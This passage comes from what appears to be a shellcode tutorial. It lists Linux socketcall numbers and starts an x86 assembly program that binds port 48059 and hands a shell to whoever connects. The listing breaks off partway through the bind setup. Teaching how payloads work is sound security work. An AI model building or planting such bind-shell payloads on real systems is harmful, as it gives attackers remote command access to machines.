h
To build a basic socket, you will only need
- SYS_SOCKET 1
- SYS_BIND 2
- SYS_CONNECT 3
- SYS_LISTEN 4
- SYS_ACCEPT 5
- ecx: A pointer to an array of arguments for the particular function
Believe it or not, you now have all you need to jump into assembly socket programs.
port_bind_asm.asm
Armed with this info, we are ready to start building the assembly of a basic program to
bind the port 48059 (0xBBBB in hexadecimal, the value that appears in the listing below) to the localhost IP and wait for connections. Once a connection is
established, the program will spawn a shell and provide it to the connecting client.
NOTE: The following code segment can seem intimidating, but it is quite
simple. Refer back to the previous sections, in particular the last section, and
note that we are just implementing the system calls one after another.
# cat ./port_bind_asm.asm
BITS 32
section .text
global _start
_start:
xor eax,eax ;clear eax
xor ebx,ebx ;clear ebx
xor edx,edx ;clear edx
;server=socket(2,1,0)
push eax ; third arg to socket: 0
push byte 0x1 ; second arg to socket: 1
push byte 0x2 ; first arg to socket: 2
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set first arg to socketcall to # 1
mov al,102 ; call socketcall # 1: SYS_SOCKET
int 0x80 ; jump into kernel mode, execute the syscall
mov esi,eax ; store the return value (eax) into esi (server)
;bind(server,(struct sockaddr *)&serv_addr,0x10)
push edx ; still zero, terminate the next value pushed
push long 0xBBBB02BB ; build struct:port,sin.